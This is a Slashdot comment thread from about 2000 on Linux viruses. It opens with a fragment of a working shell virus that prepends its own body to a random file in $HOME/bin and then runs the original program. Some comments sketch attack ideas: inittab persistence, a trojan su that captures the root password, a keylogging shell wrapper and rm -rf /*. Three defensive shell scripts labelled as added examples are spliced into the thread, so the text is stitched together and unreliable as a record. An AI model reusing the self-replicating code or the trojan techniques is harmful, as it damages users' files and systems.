[script fragment; the beginning of this post, including the definitions of choose, infected, srandom and skip, was lost]
/dev/null
}

function infect () {
#   pathlist=`echo $PATH | tr : " "`
#   dir=`choose $pathlist`
    dir=$HOME/bin
    echo "Will infect in $dir"
    names=`find $dir -maxdepth 1 -type f`
    name=`choose $names`
    echo "will infect $name"
    if infected $name; then
        echo Already infected
    else
        if [ ! -w $name ]; then
            notwrite=1
            chmod u+w $name
        fi
        if [ -w $name ]; then
            infectfile=`mktemp /tmp/if$$.XXXXXX` || {
                echo 'cannot create a temporary file' >&2
                exit 1
            }
            (head -$[$skip-1] $0; cat $name) > $infectfile
            cat $infectfile > $name
            rm -f $infectfile
            if [ x$notwrite = x1 ]; then
                chmod u-w $name
            fi
            echo success
        else
            echo Darn, no write permissions
        fi
    fi
}

srandom
tmpfile=`mktemp /tmp/gz$$.XXXXXX` || {
    echo 'cannot create a temporary file' >&2
    exit 1
}
if tail +$skip $0 > $tmpfile; then
    infect
    chmod 700 $tmpfile
    prog="`echo $0 | sed 's|^.*/||'`"
    if ln $tmpfile "/tmp/$prog" 2>/dev/null; then
        trap 'rm -f $tmpfile "/tmp/$prog"; exit $res' 0
        (sleep 5; rm -f $tmpfile "/tmp/$prog") 2>/dev/null &
        /tmp/"$prog" ${1+"$@"}; res=$?
    else
        trap 'rm -f $tmpfile; exit $res' 0
        (sleep 5; rm -f $tmpfile) 2>/dev/null &
        $tmpfile ${1+"$@"}; res=$?
    fi
else
    echo Cannot decompress $0; exit 1
fi; exit $res
true

Linux is a virus in itself (Score:5, Funny) by razvedchik on Monday January 24, @01:07PM EST (#71)
Sometimes, I feel that Linux is a huge, 640M virus just out to ruin my life. Then I remember that resolv.conf only has one "e" in it and continue on with my mission.
It spreads from user to user, and once you're infected, you can never go back. It has been known to cripple and even destroy WinXX systems to the point of making itself the dominant OS on any machine. It makes its users say crazy things like "awk", "grep", "FUD", and so on....
The problem with e-mail lists is that you can't post as the "Anonymous Coward".

It's already here... (Score:1) by havoc- (havoc-nospam@phoenix.student.utwente.nl) on Monday January 24, @01:08PM EST (#75) http://phoenix.student.utwente.nl
... and it's called VIGOR. :-)
-- So much to compile, so little time...

Klooless Noobies (Score:2, Interesting) by Mechanist on Monday January 24, @01:09PM EST (#80)
OK, I think most of us can agree with this:
> In order for a virus to have a real effect it would require someone to be stupid enough to run (log in) as root
And with this:
> It's not so much about the product but about how you manage your system. We advise people never to do anything in root unless they absolutely have to
But the problem lies with people who run Linux but lack background with Unix configuration and security policies. For a lot of people, the user/root distinction is a pain in the ass, because they're used to Windows. They don't want to learn new stuff to run Linux, they just want to use the latest cool thing. So t Read the rest of this comment...

Sure, Linux viruses might be worse... (Score:2) by DragonHawk (dragonhawk@iname.microsoft.com) on Monday January 24, @01:43PM EST (#141)
Sure, Linux viruses might be worse because Linux is Open Source Software, all other things being equal. If you have the source, it is easier to find holes and create exploits for them.
The thing is, all other things are not equal. The advantages of OSS and the design of Unix (and thus Linux) can easily outweigh the problem of open access to the source code. On the OSS side, you have peer review by a cast of thousands, and the ability to check for malicious code yourself. On the Unix side, you have the concept of security permissions which prevent viruses from propagating as easily.
Sure, if an infected program is run by a user with root privileges, it can seek out and infect other programs. But you can easily restrict virus behavior by not running things as root. Install your package as root, but run it as a user. Your home directory is, of course, vulnerable, but you have cut a potential propagating virus down to a simple Trojan Horse. Viruses are so dangerous because they spread unknowingly; a Trojan is quickly discovered and snuffed when people discover what it does.
Will malicious code be a problem on Linux? Of course. It already is. But thinking the same problems of the MS-Windows world apply in the Unix one is an error. What we may see is smarter, more sophisticated attacks being deployed. MS-Windows is so poorly designed that virus writers have it easy. With Linux, we may see fewer, but far more dangerous, malicious programs. That, if anything, should be the real fear. Sticking with trusted, Open Source Software should keep such problems to a minimum, however.
All in all, I think Linux users have far less to worry about than MS-Windows users.
I do not like Microsoft. Remove them from my email address.

Run for your lives!! (Score:1) by zornorph on Monday January 24, @01:51PM EST (#152)
Good thing I didn't sell my y2k secure underground bunker complex, I'll have a safe place to hide when it all comes down ;)

Virii, Viruses & Co. (Score:1) by Lutz (urc8@rz.DO_NOT_SPAM_ME.uni-karlsruhe.de) on Monday January 24, @01:57PM EST (#153)
As far as I know, virus is a Latin word. And then the plural form is viri, not virii. Sorry, I could not resist. But 'virii' hurts...

A CRISIS IN AMERICA (Score:0) by Anonymous Coward on Monday January 24, @02:12PM EST (#165)
Dear Citizens: We are facing a CRISIS in America. A crisis in the workplace. A crisis of GENDER INEQUALITY. A crisis that affects us all. Now, in the last year of the 20th century, you wouldn't expect to still find sexism and gender discrimination in the workspace, would you? Well, think again.
Employment figures recently RELEASED BY THE FEDERAL GOVERNMENT have something STUNNING and DISGRACEFUL to say!
FACT: For every dollar a man makes, A WOMAN GETS SIXTY CENTS!
What they DON'T tell you: Do the math! Once the woman gets her sixty cents, ONLY FORTY CENTS ARE LEFT FOR THE MAN!
For every dollar the man makes:
a woman - sixty cents
the man - forty cents
THE WOMAN GETS PAID FIFTY PERCENT MORE FOR THE SAME WORK! WE MUST NOT STAND FOR THIS GENDER GAP IN THE WORKPLACE!
What can YOU do? Write to your Congresspersun and tell her or him "MEN DEMAND EQUAL PAY FOR EQUAL WORK! WE WANT OUR FAIR SHARE! END THE PAY GAP."
Only when the feminine stranglehold on the workplace is broken, and men no longer get 50% less pay than women, will this country be TRULY FREE.
Thank you for reading, brothers and sisters!!!

Viruses, or Virii?? (Score:1) by llzackll on Monday January 24, @02:19PM EST (#171)
Which is correct?
Some things that are going to make Linux easier to attack:
One of the things that I notice about Linux is that there is some overlap between these lists. It seems to point to the idea of tamper-evident packaging.
The bottom line is that there will be people who will do destructive things. There will be security holes that they will take advantage of. There is a need for security conscious people willing to patch them. A virus is just one way of taking advantage of security holes.
The net will not be what we demand, but what we make it. Build it well.
There is a lot of crap coming from Russia these days, and this just another example.
Microsoft will blame it on the poor security model in Linux.
I'm trying to teach myself to set people on fire with my mind... Is it hot in here?
Corel Linux makes you set up a user.
The installation instructions in Slackware 3.4 told me to make a user account, so I did.
I think the real problem is that Linux distros assume you are not stupid. They assume you can and do read instructions. The fact that people *are* stupid cannot be helped.
Is this post not nifty? Sluggy Freelance. Worshi
Microsoft is pleased to announce its first product geared toward the Linux marketplace:
MS Virii 1.0
We can't code worth a damn on our own OS... think we're gonna do much better on a free OS?
(grin)
--Alex
This is a signature virus...
--
We have fought the AC's, and they have won.
I don't like the way everyone is so convinced linux is secure. No OS I know of can account for a newbie being stupid (ie. blindly running files he/she just downloaded off the 'net) ;) And as far as infected executables go: I don't know many people who put executables in their home directory. Even if they do, the worst that could happen is a loss of their user account files. On Windows, the worst that could happen is a loss of the entire system. You tell me which you'd rather deal with!
Well, your point seems to be that linux is not safe from virii. Now I haven't heard anyone say "Linux is immune from virii," but the fact remains that they are far less common than in Windows-land. And if/when they ever do become common, it will be easier to limit the amount of damage they can do, esp. compared to win9x systems. I don't think any informed readers will disagree with me here.
Even though they may not be able to damage anything other than the user's files, the infected program will probably be able to read the user's address database and send itself to, say, the first 50 names in the address book (ring any bells? :-). I'm fairly sure I could write said virus myself but I don't want to go to prison! If the virus also "merged" itself with other executable files in the user's home dir then that opens another way to get itself spread. To do that requires knowledge of the file format (like it says in the article) but that is known for Windoze as well, so that stumbling block is irrelevant. This is where education is important. Newbies (and others) need to be reminded to run the program under the strictest possible environment (something like user 'nobody' and disallow network access etc.), especially nowadays as GNU/Linux has attracted virus writers' attention.
Your comments about possible angles of attack for Linux virii are kinda misleading. The email virus you referred to only affected Outlook/Outlook Express users IIRC. AFAIK they are not available for Linux at this moment.
Virii is not really correct. Check this page "What's the plural of virus" http://language.perl.com/misc/virus.html
Well, it seems that because of Linux's Open Source nature it would be easier to target exactly which method is being used by said virii. Therefore, any fix would be as easy to come by as any other.
The party's over
grep -i -r virus /usr/src/linux
COMMON SENSE: Log in as root, back up your user account's home directory, and then change the permissions on the backup so that the user account can't access it. Not a big deal!
Thankfully, Jason Clifford, a Linux person, is also quoted in the story setting the story a bit straighter. What the hell is a Linux Person? Does this mean the GPL virus has successfully invaded and assimilated a human?
I once heard about some guys running a server for a law firm. The desktops were Win 95/98 and the server was immune. Then they found out that they had a virus on the system killing all the windoze machines.
Then they found out that there was no anti-virus program for their server OS (I don't know which).
Come on, I hope you aren't believing the crap that the linux "expert" is trying to pull. Once you can run binaries on a machine, you can almost always get root somehow. It's _very_ hard to truly secure an OS against binaries running. Virii really are a concern.
Another method would be to scan the hard drive for setuid executables and test them for buffer overflows. Managing to do that in a small amount of space and without alerting the user that something is wrong due to drive thrashing would be quite a feat.
A virus would not be as robust in Linux either, due to the differences in distributions and the tendency for a lot of people to compile their own code. A virus distributed in source code form wouldn't survive very long.
Viruses would also have to fear programs like tripwire which take checksums of vital executables. This is another good reason to use tripwire and related products. While it is possible to defeat tripwire, it would involve more code than a virus is likely to want to carry in its payload.
Ironically, the best way to infect a Linux system with a virus would probably be from DOS. The author would have to encode enough ext2 reading and writing capabilities into his payload in order to subvert the linux side of the system and that code could get rather large.
Unless you code your virus in a macro language, the cross-platform nature of Linux will also bog down the prospective virus writer. Since the architectures are very different and viruses usually do very low-level stuff, he'd have to port the machine-dependent code to the various Linux platforms. On the plus side he could use cvs and bugzilla so that his users could report bugs with his virus.
I'm trying to teach myself to set people on fire with my mind... Is it hot in here?
Given his complete ignorance of how Unix-like operating systems work
What does how UNIX works have to do with whether people write viruses to attack it? Have you forgotten that the first viruses/Trojan horses to infect the Internet were hosted by UNIX systems? They attacked UNIX because that's what most of the systems on the Internet ran at that time.
he just assumed that more malicious coders + more popularity = more viruses.
This assumption is supported by the fact that most viruses attack Windows systems today. Why? Because most systems connected to the Internet run Windows.
I took some time explaining that Linux was different because of a) availability of source code
The availability of source code allows a virus writer to find weaknesses that a virus might exploit...period. You can argue that the availability of source code allows more people to look for security holes, but it does not itself prevent exploitation of security holes. On the contrary, existing security holes become vastly easier to exploit when the virus writer can see exactly how the source code works.
b) permissions
Viruses defeat permissions by exploiting weaknesses in system software or application code...that is their function. To cite "permissions" as protection from viruses is like saying that burglaries can't occur because people have locks on their doors.
c) the extreme wariness of the average Linux user of running untrusted binaries.
The whole point is that the definition of the "average Linux user" will change dramatically as Linux becomes more widely used. The average Linux user will no longer be a person who has time to catch and install every security patch that happens to be issued. The average Linux user will be someone who just wants to get their job done without having to learn to be a system administrator.
If the guys who coded the daemon didn't do a good job, a virus writer might be able to swing a buffer overflow with a properly coded GET request. I don't know off the top of my head exactly what effect overflowing a buffer would have in the kernel though.
I'm trying to teach myself to set people on fire with my mind... Is it hot in here?
You could also not allow users, which is a much more sensible solution for 90% of the Linux using population. Most users don't have the know-how to lock their system down well enough to prevent a user from exploiting a buffer overflow. The general rule of thumb is if you don't trust a user with root, don't let him on your system.
I'm trying to teach myself to set people on fire with my mind... Is it hot in here?
Right?
I'm trying to teach myself to set people on fire with my mind... Is it hot in here?
Once the Linux kernel starts, it takes over (hence the reason loadlin works out of DOS, etc.) and the loader does nothing else; in fact it can't. So in the boot partition or not, it only affects the loader, so it is a loader virus, not a Linux virus. Now if they just recreated the boot sector (hence loader) virus, they have done nothing special. But if you are like me, you write down your partition tables on the side of the PC anyway... since my friends have root and love to delete partition tables.
I already have it on my Linux box. It installs itself in C:\WINDOWS and causes your computer to freeze at a blue screen. I am very scared. Quick, someone write an anti-virus program that will clean this from my computer.
...the system.
It doesn't need to infect or modify the kernel at all. All it needs to do is copy itself into the filesystem somewhere and insert a line into /etc/inittab. Bingo! The malicious code is started at boot, can have root privileges and it can use the network to bootstrap/download a more sophisticated/larger/updated version of itself and so forth, link itself into other "normally running processes" whatever...
Imagine a virus-ized version of syslogd, init itself, or any other core component.
Once you have access to an unprotected file system, you can do whatever you want. The virus might even be able to run under windos and access the linux partitions directly. Forget infecting LILO, dual boot boxes are dangerous no matter.
Good judgement comes from experience, and experience comes from bad judgement.
- W. Wriston, former Citibank CEO
> Certainly all of /usr and /boot should be read only. New programs added later should go in /usr/local which can be a separate partition, and even that should be read-only except when you actually add stuff.
Are there any HOW-TOs that explain how to do this?
i.e. How do you mount /boot as read-write for when you want to update your kernel?
Thx.
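One way to answer the question above, as an added example that is neither from the thread nor from any distribution's documentation: keep the filesystems the quoted post names read-only in /etc/fstab, remount a single one read-write only for the duration of a kernel update, and script a check that the read-only entries are still in place. The fstab text in the block is a constructed sample (device names and options are illustrative); the remount commands in the trailing comment are standard mount(8) usage.

```shell
#!/bin/sh
# Added example, not code from the thread. Audits an fstab for mount points that
# should carry the "ro" option, e.g. /usr, /usr/local and /boot as suggested above.
# The table is a constructed sample: /usr is correct, /usr/local and /boot are not.
SAMPLE_FSTAB='# <device>    <mount point>   <type>  <options>         <dump> <pass>
/dev/hda1     /               ext2    defaults          1 1
/dev/hda2     /usr            ext2    ro,nosuid         1 2
/dev/hda3     /usr/local      ext2    defaults          1 2
/dev/hda5     /boot           ext2    defaults,noauto   1 2
/dev/hda6     /home           ext2    defaults,nosuid   1 2'

# audit_ro FSTAB_TEXT MOUNTPOINT... : print each named mount point whose fstab
# options do not include "ro" (a mount point with no entry at all is reported too).
# Returns 0 when every listed mount point is read-only, 1 otherwise.
audit_ro() {
    fstab=$1; shift
    bad=''
    for mnt in "$@"; do
        # fourth column of the non-comment line whose mount point matches exactly
        opts=$(printf '%s\n' "$fstab" | awk -v m="$mnt" '$1 !~ /^#/ && $2 == m { print $4 }')
        case ",$opts," in
            *,ro,*) ;;                      # already read-only, nothing to report
            *)      bad="$bad$mnt
" ;;
        esac
    done
    [ -z "$bad" ] && return 0
    printf '%s' "$bad"
    return 1
}

# Updating a kernel on a read-only /boot is a temporary remount, not a permanent
# fstab change (standard mount(8) invocations, run as root):
#   mount -o remount,rw /boot
#   ... copy in the new kernel image and update the boot loader ...
#   mount -o remount,ro /boot
```

Running `audit_ro "$SAMPLE_FSTAB" /usr /usr/local /boot` against the sample prints /usr/local and /boot, the two entries that still mount read-write; a cron job that runs the same check against the real /etc/fstab (and `mount` output, which is what is actually in effect) catches the case where someone forgot the second remount.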
Melissa is an interesting and very virulent virus.
But one highly unlikely to infect *nix boxen because all the key executables are unwritable by the user.
The same goes for *nix office suites _unless_ they allow execution of user binaries, or have dangerous macro commands. The latter is quite likely because some people want to do bulk mailings so Melissa workalikes could thrive.
There is also the diversity safeguard. It is easy for viruses to spread in the MS-Windows world because there is basically one OS run on a great number of machines. Monoculture. *nix is fragmented, and hence more difficult to attack.
-- Robert
Some of my friends send email alerts for new virus and related stuff. I always reply saying: "Format your hard-disk and install Linux. Happy Virus-Free computer experience!"
With Linux, that doesn't have to be the case. It's only as much the case as YOU choose it to be.
Suggestions:
It's a small world and it smells funny; I'd buy another if it wasn't for the money; Take back what I paid (SoM)
> In the US more than 95% of the privately held land is owned by only 3% of the population.
Do you mean most people not having Allodial Title for their land ?
Do you happen to have a link to the source of that data?
Thx.
>I may be one of the only Slashdot geeks to have majored in Classical Languages ...
Indeed, you might be the only one, but some of us out here still enjoy learning something new everyday, and I will mention that good grammar and spelling is also appreciated by the literate among us.
Good judgement comes from experience, and experience comes from bad judgement.
- W. Wriston, former Citibank CEO
from the article:
>... have successfully completed one such prototype: the result is a fully functional and potentially virile Linux virus.
i was more or less under the impression that "virile" (from latin "vir" meaning "man," i believe--akin to "puerile" from "puer" = "boy") referred to the sexual capability of a male, and that the correct word to describe a particularly nasty virus was "virulent." anyone want to correct me?
And the packets did boil and the ports turned red and soon every script kiddie in the land did make their way to his system, yea verily and they did own it.
And the luser cried out to his elders and asked of them why there was no hard drive space left and why his drives did thrash the day and night and why 'who' did show 50 users on his system at all times.
And lo, the elders laughed and spake unto him that it was time to wipe his hard drive clean of past sins and reinstall. And they did call him a dipshit and made fun of his penis size, and thus the luser was enlightened.
I'm trying to teach myself to set people on fire with my mind... Is it hot in here?
Yes, that's true. But, remember, Linux is not just a server OS. More and more people are starting to use it on their home machines. And I really doubt that those boxes could be called "properly administered". If Delmoi's files get deleted, and Delmoi is the only user account, all that good security isn't going to be worth shit.
Anyway, I'm not saying that Linux is anywhere near where Windows is in viral susceptibility, but it is possible, and still not a good thing..
[ c h a d o k e r e ]
ReadThe ReflectionEngine, a cyberpunk style n
It's a small world and it smells funny; I'd buy another if it wasn't for the money; Take back what I paid (SoM)
The upshot is that users in the know back up their critical data on a regular basis. If you can't be bothered to do that, don't expect any sympathy from anyone.
I'm trying to teach myself to set people on fire with my mind... Is it hot in here?
But, you wouldn't need to rewrite the disk file. Just make an app and stick it in the ~/.bashrc file or whatever. This would be detectable, but most people probably don't check their .bashrc files that often.
The idea I had was this: write a program that when run presents the user with a shell prompt; anything typed in gets passed to the bash shell underneath it, except keystrokes are recorded. The program is 'loaded' when the user starts the trojan, and sort of sits between the user and the TTY, if possible, otherwise between the TTY and bash. It captures input and output, and can see if someone uses su.
[ c h a d o k e r e ]
ReadThe ReflectionEngine, a cyberpunk style n
Tripwire takes checksums of all your important files, a major feature in many antivirus programs. Write your checksums to a zip disk, set the read only tab and check them every few days.
I'm trying to teach myself to set people on fire with my mind... Is it hot in here?
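The checksum baseline that both tripwire comments above describe (checksums of vital executables, written to read-only media and re-checked every few days), as an added example that is neither tripwire's code nor from the thread. It assumes sha256sum from GNU coreutils plus POSIX find, sort, uniq and awk; the "sbin" tree it checks is constructed in a temporary directory for the demo.

```shell
#!/bin/sh
# Added example, not tripwire's code and not from the thread: a checksum
# baseline of a directory tree, and a check that reports what changed since.
# Assumes sha256sum (GNU coreutils) and POSIX find/sort/uniq/awk/sed.

# hashes DIR : one "hash  ./relative/path" line per regular file, sorted
hashes() {
    ( cd "$1" && find . -type f -exec sha256sum {} + ) | LC_ALL=C sort
}

# baseline DIR BASELINE_FILE : record the current hashes (keep this copy on
# read-only media as the post suggests; a baseline the intruder can rewrite is worthless)
baseline() {
    hashes "$1" > "$2"
}

# verify DIR BASELINE_FILE : print the relative path of every file that was
# modified, added or removed since the baseline. Returns 0 if nothing changed,
# 1 if something did.
verify() {
    now=$(mktemp) || return 2
    hashes "$1" > "$now"
    # after merging both listings, a line that appears only once is a change:
    # a modified file contributes two different lines, a new or deleted file one
    diffs=$(LC_ALL=C sort "$2" "$now" | uniq -u | awk '{ print $2 }' | LC_ALL=C sort -u | sed 's|^\./||')
    rm -f "$now"
    [ -z "$diffs" ] && return 0
    printf '%s\n' "$diffs"
    return 1
}

# demo : constructed stand-in for /sbin; one binary is overwritten and one
# unexpected file appears (the /sbin/initd drop described earlier in the thread)
demo() {
    work=$(mktemp -d) || return 2
    mkdir "$work/sbin"
    printf 'original init\n'    > "$work/sbin/init"
    printf 'original syslogd\n' > "$work/sbin/syslogd"
    baseline "$work/sbin" "$work/baseline.sha256"
    printf 'trojaned syslogd\n' > "$work/sbin/syslogd"   # simulated tampering
    printf 'unexpected file\n'  > "$work/sbin/initd"     # simulated dropped binary
    changed=$(verify "$work/sbin" "$work/baseline.sha256") || :
    rm -rf "$work"
    printf '%s\n' "$changed"
}
```

`demo` prints initd and syslogd, the dropped file and the overwritten one; unchanged init is silent. Run `baseline /sbin /mnt/zip/sbin.sha256` once from a known-clean boot, then `verify /sbin /mnt/zip/sbin.sha256` from cron, and remember that a check run from a compromised system with a compromised sha256sum proves nothing, which is why the poster's read-only tab and a boot from clean media matter.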
funkman has hit it right on the head. As has been discussed before on Slashdot, most out-of-the-box installations are not very securely configured. It will only take one "virus" or trojan horse to attack one such distribution to give Linux a bad reputation for quite a while, no matter how we respond after-the-fact. If the Linux community doesn't want to get a reputation for slipshod security among _average_ users, we have to address this problem before it happens, and with all the major distributors.
Most modern unices have some form of configurable resource limits. Things like number of processes, amount of memory, CPU usage, etc. can usually be limited per user, making "attacks" of this nature worthless.
Disk quotas can prevent users from filling up filesystems, also.
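What a kernel-enforced resource limit does to a runaway process, as an added example that is not from the thread: the writer below is told to append 64 KiB to a file, and under a 4 KiB file-size limit (ulimit -f counts 1024-byte blocks) the kernel truncates the write at the limit and stops the process with SIGXFSZ. Only the file-size limit is exercised because it is the one ulimit option POSIX sh guarantees; the per-user limits.conf mechanism the block mentions in a comment is stated, not run.

```shell
#!/bin/sh
# Added example, not from the thread: a kernel-enforced resource limit
# confining a misbehaving process. Only ulimit -f (maximum file size, in
# 1024-byte blocks) is used because it is the one limit POSIX sh guarantees.

# runaway_write FILE : stands in for a program that fills the disk; it tries
# to append 64 KiB from /dev/zero in one go
runaway_write() {
    head -c 65536 /dev/zero >> "$1"
}

# bytes_written FILE : file size as a plain number
bytes_written() {
    echo $(( $(wc -c < "$1") + 0 ))
}

# confined_size : run the writer in a subshell with a 4 KiB limit. The kernel
# cuts the write at the limit and then delivers SIGXFSZ; the subshell's failure
# (and the shell's "File size limit exceeded" message) is swallowed so the
# caller just sees how far the writer got.
confined_size() {
    f=$(mktemp) || return 2
    ( ulimit -f 4; runaway_write "$f" ) 2>/dev/null || :
    n=$(bytes_written "$f")
    rm -f "$f"
    echo "$n"
}

# unconfined_size : the same writer with no limit, for comparison
unconfined_size() {
    f=$(mktemp) || return 2
    runaway_write "$f"
    n=$(bytes_written "$f")
    rm -f "$f"
    echo "$n"
}

# The per-user form of the same idea lives in /etc/security/limits.conf on
# PAM-based systems (hard limits on nproc, fsize, as, ...); disk quotas cover
# the filesystem-wide case the post mentions.
```

`confined_size` returns 4096 and `unconfined_size` returns 65536; the limit is inherited across fork and exec, so a login shell started with it confines every program the user runs, which is exactly what the post means by making "attacks" of this nature worthless.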
I mean it :)
Unfortunately, as Linux gains a reputation as being an alternative to Windows among desktop users, and begins to replace Windows in the desktop and especially in homes, the culture is going to change. People _will_ start e-mailing "Elf Bowling" and other executables to each other. After all, they could do it on Windows, and all those Linux gurus keep saying Linux is more secure... Security is at least 50% people. If we win the desktop war, the virus wars will not be far behind. Not because of technology, but because of people. Do we really want to win the desktop war?
-Elendale (gets that starry-eyed face)
IANAT (I Am Not A Troll)
...your dual boot firewall and how all of /etc/rc.d.... is protected from anything while the "other" os is running.
The plural of "virus" is "viruses". It was not a 2nd declension masculine noun in Latin, and therefore does not go to "-i". And it was not "-ius" like filius, so definitely doesn't go to "virii". See Tom Christiansen's page about this.
The plural of "virus" is "viruses", not "viriiii".
The plural of "virus" is "viruses", not "viriiiii".
I know that for some people tweaking their computer is practically the point of owning one. But I use mine as a freelance writer. The "root is safe so don't worry" attitude makes me think of a bank that has a super modern secure vault. But they know that every time they open it to put something inside, someone could catch the combination or get a clue of how to break it open. So they keep all the money and valuables outside the vault and pride themselves on the fact that they have perfect vault security!
...will work for Chick tracts...
I found this post to be rather interesting but I know the story behind Linux virii. What I want to know about are virii that exist on the Mac and BeOS platforms. Do they exist? Are they a major problem? What are the technical details behind their existence or lack thereof?
...let me see if I can zip back up the history...
Not dual boot firewalls, but the vulnerability of Linux when running Windows on the same box.
So of course neither you nor I would dual boot a firewall or server, and as a workstation, running vmware is looking more and more attractive each day. Hmm, have you told the vmware folks about the security ADVANTAGE that their software gives linux users who would otherwise dual boot?
I've been using Linux for several years now and have been pretty happy with it. If what you say about Ishtar is true, however, I'll have no choice but to ceremonially burn all of my CDs and hard drives. I suppose next you'll tell me FreeBSD was behind "It's Pat".
correction gratefully received. I just checked my source and found that the phrase I remembered was "enculer les mouches".
"Even if a virus cannot gain root access, to a home PC user, deleting his entire home directory is just as bad as infecting /bin/ls"
Not quite true. If a virus deletes my entire home directory, and I'm smart, I just whip out the latest backup CD-R and do the restore as root. Voila, no more virus.
On the other hand, if a virus infects my system running as root or infects my Windows system, there is nothing short of a reinstall I could do to make sure my system is secure. That virus might have infected anything on the system, from /bin/ls or explorer.exe to the kernel modules or kernel32.dll, and short of booting from a known clean floppy and reinstalling there's no way to be certain that a running virus isn't hiding itself from virus checkers (which isn't hard), maliciously attacking personal files repeatedly.
And frankly, I have to reinstall Windows often enough when it's virus-free. I haven't reinstalled Linux in years, and I'd like to keep it that way.
All the virus has to do is create a trojan su program in the user's home directory, alter the path, and the next time he tries to run su, the virus gets his root password.
Download a program to your computer
Port it to your architecture and configuration
Compile itself
Install itself
Run itself (as root nonetheless)
All without the user even noticing!
If you log into a Linux box with the most powerful account you have and type rm -rf /* and press enter, it will do as much damage to a Linux box as any virus could. Recursively force removal of all (/*) files. Account permissions make this kind of power controllable.
Using Linux is not the same as using Windows, in fundamental ways. Any parallels that people draw are almost certain to be wrong if you talk to a real expert.
?
That's a great idea. Mind if I send it to David Ranch? (so he can incorporate it into his Securing Linux Doc aka "Trinity OS")
Securing Linux - Trinity OS
Cheers
Well, look at the Linux/Staog computer virus. It does exactly what we're worrying about in exploit bugs.
Linux as an operating system is, in actuality, a lot more insecure than we'd like to admit. To prove my point, look at RedHat's Linux 6.1 Security Advisories page. How many of these packages were fixed to prevent root exploits? Five of thirteen. But look at how common some of these five are!
Malicious people can use lpr of all things! Another famous example: bind. Or how about wu_ftpd? Those two alone are present on how much of the Linux community?
Honestly, were it not for freshmeat.net, I probably would not have discovered the existence of the new packages. (I don't check RedHat's site often. And I don't sign up for mailing lists either... So this is my fault.)
There are script kiddies out there who can manipulate the overflows in bind. (Please, for the love of God, if you haven't updated to bind 8.2.2_P3, go do so!) If a script kiddie can find a way to do that, then some coder worth his paycheck can probably figure out a way to have a program manipulate itself into root that way.
I mean, all some perverse (or highly bored) programmer has to do is write a program to manipulate those bugs to get root... And then run rm -rf / to kill your machine. (There are, of course, nastier things one could do, but the less ideas I generate for others, the better.)
By no means, are we safe. Linux virii will eventually be created and released into the wild. (There are even some that claim that MicroSoft will be the origin for the epidemic.)
The only way we can keep ourselves truly safe is to catch security holes before the other side does and update our source packages before the attacks start.
There is a saying in network security: "One loose link is all you need."
--CAE
In the MS world, the most potent and prevalent virii are macro viruses. Over time, MS built in limited forms of checks to prevent the average user from doing bad stuff to themselves, although the problem is still bad.
The KOffice team are about to release a product that has corba access to all other components and is scriptable using python. Python has no security model and can import many useful modules to do pretty much anything you could do via C or C++ to your system. If a Koffice script can look up your address book via the ORB and run system(), Melissa/koffice is well on the way to being written - and very successful with those running Koffice.
Linux is not immune to virii, and never will be. Most distributions are out to win the tick box war, which means packages+++. I can assure you that no one has the time to check all the packages being installed; and some of them are huge. So bugs will be there, which creates exploit opportunities. Just one common get root exploit is enough to allow a virii to propagate easily.
A smug smart arse attitude to Windows users will not help once the virus kits start getting distributed. Take the problem seriously, and use proper precautions:
Andrew van der Stock
As we all know, the best viruses come from Australia. In the case of linux viruses, check the mailing list archives maintained by Silvio.
Who is an all round cool guy.
How we know is more important than what we know.
Indeed an amusing article (the ZDNet one). However, a couple of weeks ago, I happen to have written a piece that I think does comprehensively cover the question: http://linuxmafia.com/~rick/faq/#virus
I wrote that after I was ask about Linux virus-checkers once too often.
--
E2 IN2 IE?
Well, the news is not easy to take, and I never claimed that it was. Nevertheless I believe that it is fundamentally better that Linux users know the truth. Yes, you can go on deluding yourself, but in the long run, you only hurt yourself if you hide from the truth.
I suppose next you'll tell me FreeBSD was behind "It's Pat".
This is true. Not only was FreeBSD behind this movie, it was also behind several other movies that were less-than-high-quality:
- A Night at the Roxbury
- Mom and Dad Save the World
- Howard the Duck
- Plan 9 From Outer Space
I hope you can see why FreeBSD shan't be allowed, now or ever. BTW, who has the most to benefit from that article? AV company reports virii attack from the "evil" Chinese. Hysteria, another white collar meat.
I think I echo the other anti-NT comments by saying:
:)
"You would have to eat 12 bowls of Windows NT to get the features found in one bowl of Linux! Also, NT is lacking in Iron, Stability, Support, and other vital nutrients."
Please, guys, keep it funny. It's a funny post.
Or, for the English-impaired:
grep -iv FUD funny.post
---
pb Reply or e-mail; don't vaguely moderate.
I wrote a good portion of the "proper reading" on computer viruses.. the term "virii" is a valid collective term.
How we know is more important than what we know.
Only the virus boot loader needs to fit within 512 bytes. The bulk of the virus can reside elsewhere on the disk, loaded by the few dozen virus bytes added to an infected LILO. Hardware is so fast today, who would notice a 5MB virus loading?
However, most newbies don't run any binaries (or even scripts) that they have write access to! How is a file infector going to work if all their executables are owned by root and they don't have write access?
Any sufficiently advanced technology is indistinguishable from a rigged demo
--Andy Finkel (J. Klass?)
Linux is a UNIX clone. Duh, of course it copies UNIX.
The security system is pretty much sound if you don't run as root. Running a virus infected program as a user will only destroy that which you have access to... a far cry better than DOS to be sure. Besides, even the most secure NOS can be defeated by an incompetent user. Good security habits are just as important as a good security model.
Here's my DeCSS mirror, where's yours?
I was coding a Perl piece the other day, and I hadn't done so in a while, and it'd gotten pretty messy. Anyways, it turned out that there was a variable assignment that was supposed to assign a string to a variable, but the subroutine from which it was called had the same name (I'll be using quotes more often now. :). Turns out that Red Hat 6.0 has no user limits set, and that any user can bring the whole system down just by writing a simple script that keeps calling itself and bogs up all the memory, then the swap space, and then it began shooting off random processes... well, you know how it goes. This surprised me quite a bit. I'm sure there must be other distros out there that have this problem, and I call it a problem, because I think that this is not something that every admin should have to think of when installing their system.
Cheers!
Costyn.
The Official Steve Ballmer Webpage
Yeah, good Tori Amos single, but on the album I like Concertina at the moment. :)
/. users
Yes, this is off-topic. Moderating it down is silly, because it says "Off Topic" at the top, so save your points guys.
Anyway, I said something useful further up, and this "news" is just hype generated to sell a product as others have said. Look deeper
Until now it seems Windows is a virus but there are fundamental differences: Viruses are well supported by their authors, their program code is fast, compact, and efficient, and they tend to become more sophisticated as they mature.
So, Windows is not a virus.
(credit unknown)
maybe you'll find this entertaining :-)
Unknown
or just annoying
Doesn't quite qualify, but hazards come from unexpected places.
